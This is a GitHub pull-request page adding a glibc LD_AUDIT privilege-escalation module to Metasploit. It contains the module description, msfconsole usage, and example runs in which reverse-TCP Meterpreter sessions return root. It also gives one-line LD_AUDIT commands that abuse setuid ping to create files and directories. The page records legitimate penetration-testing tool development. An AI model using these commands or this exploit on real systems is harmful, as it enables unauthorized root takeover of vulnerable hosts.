Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation exploit #9469

Merged
merged 3 commits into from Feb 9, 2018

Conversation

@bcoles
Copy link
Contributor

bcoles commented Jan 28, 2018

Add glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation exploit.

    This module attempts to gain root privileges on Linux systems by abusing
    a vulnerability in the GNU C Library (glibc) dynamic linker.

    glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
    properly restrict use of the LD_AUDIT environment variable when loading
    setuid executables. This allows loading arbitrary shared objects from
    the trusted library search path with the privileges of the suid user.

    This module uses LD_AUDIT to load the libpcprofile.so shared object,
    distributed with some versions of glibc, and leverages arbitrary file
    creation functionality in the library constructor to write a root-owned
    world-writable file to a system trusted search path (usually /lib).
    The file is then overwritten with a shared object then loaded with
    LD_AUDIT resulting in arbitrary code execution.

    This module has been tested successfully on glibc version 2.11.1 on
    Ubuntu 10.04 x86_64.

    RHEL 5 and Debian 5 are reportedly affected, but untested. Some glibc
    distributions do not contain the vulnerable libpcprofile.so library.

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf5 exploit(multi/handler) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc 
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[+] The target appears to be vulnerable
[*] Using target: Linux x64
[*] Writing '/tmp/.GQh1C8euY' (1913 bytes) ...
[*] Writing '/tmp/.3l76zsoHT' (246 bytes) ...
[*] Writing '/tmp/.WSuOVyo' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (857352 bytes) to 172.16.191.149
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.149:45721) at 2018-01-27 23:59:36 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.149
OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
@sempervictus

This comment has been minimized.

Copy link
Contributor

sempervictus commented Jan 28, 2018

You really like being root eh? :)
I wonder if there's a way to search onhost libs for the relevant function imports to make this work on targets lacking libpcprofile. Resolve imports or something, libs should be readable by unprivileged users.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jan 28, 2018

@sempervictus MSF linux local EoP needed some love.

As for on-host detection of libraries - Tavis discusses some techniques to find libraries with constructors programmatically using objdump / gdb. However, the library would need to be disassembled, or the source code reviewed, to find a suitable attack vector.

From Tavis' advisory:

[...] can be exploited by locating a DSO in the trusted search path with
initialization code that has not been designed to operate safely while euid !=
uid.

Disassembling and analyzing potentially viable libraries programmatically on-host on-the-fly without access to the application source code would be cool, but well beyond the scope of this PR.

Instead, additional known-vulnerable libraries could be added to the module as targets in the future.


Tavis pointed out liblftp-tasks.so.0 can be used to create arbitrary directories:

LD_AUDIT="liblftp-tasks.so.0" LFTP_HOME=/etc/exploit ping


Similarly, Todor Donev pointed out that libmemusage.so, also distributed with glibc, is vulnerable in the same way as libpcprofile.so :

LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="$OUTPUT" ping


It seems that systems without libpcprofile.so were also missing libmemusage.so, so I simply opted for the former rather than support both.

@sempervictus

This comment has been minimized.

Copy link
Contributor

sempervictus commented Jan 28, 2018

On-target disassembly and analysis is probably something to bring up with @acammack-r7 in the context of mettle internals. Doesn't metasm have something for that?
I'm all for a vuln lib list we can grow over time.

@bcoles bcoles added the delayed label Feb 1, 2018
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 1, 2018

Delayed pending fix for #9482

@bcoles bcoles added docs and removed needs-docs labels Feb 7, 2018
@bcoles bcoles added delayed and removed delayed labels Feb 7, 2018
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 7, 2018

Leaving the delayed tag on this one. There's a bug when running this module on shell sessions I want to fix.

@bcoles bcoles removed the delayed label Feb 8, 2018
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 8, 2018

Fixed bug with shell sessions on Debian. Ready for review.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 9, 2018

Ubuntu 10.04 x64 (only openSSH added from iso install)

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.11.1 is vulnerable
[*] Checking for libpcprofile.so in system search paths
[+] Found libpcprofile.so in /lib
[+] /bin/ping is setuid
[+] The target appears to be vulnerable
[*] System architecture is x86_64
[*] Using target: Linux x64
[*] Writing '/tmp/.bOC5g5P' (1913 bytes) ...
[*] Max line length is 65537
[*] Writing 1913 bytes in 1 chunks of 4369 bytes (octal-encoded), using printf
[*] Writing '/tmp/.7NCrLfnfk' (239 bytes) ...
[*] Max line length is 65537
[*] Writing 239 bytes in 1 chunks of 846 bytes (octal-encoded), using printf
[*] Writing '/tmp/.zSNpezl' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : ubuntu10.04
OS           : Ubuntu 10.04 (Linux 2.6.32-21-server)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 9, 2018

also worked from meterp shell

@h00die h00die merged commit 5b251ae into rapid7:master Feb 9, 2018
1 check passed
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
Details
h00die added a commit that referenced this pull request Feb 9, 2018
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 9, 2018

Release Notes

The exploits/linux/local/glibc_ld_audit_dso_load_priv_esc module has been added to the framework. This module abuses a vulnerability in the GNU C Library (glibc) dynamic linker on Ubuntu 10.04 and other similar age operating systems for local privilege escalation.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 9, 2018

Nice work, i was mainly worried i wouldn't be able to get the vuln software, but Ubuntu 10.04 was good to go from ISO.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 9, 2018

Thanks @h00die

@bcoles bcoles deleted the bcoles:glibc_ld_audit_dso_load_priv_esc branch Feb 9, 2018
@h00die h00die self-assigned this Feb 9, 2018
jmartin-r7 added a commit to jmartin-r7/metasploit-framework that referenced this pull request Feb 12, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

4 participants
You can’t perform that action at this time.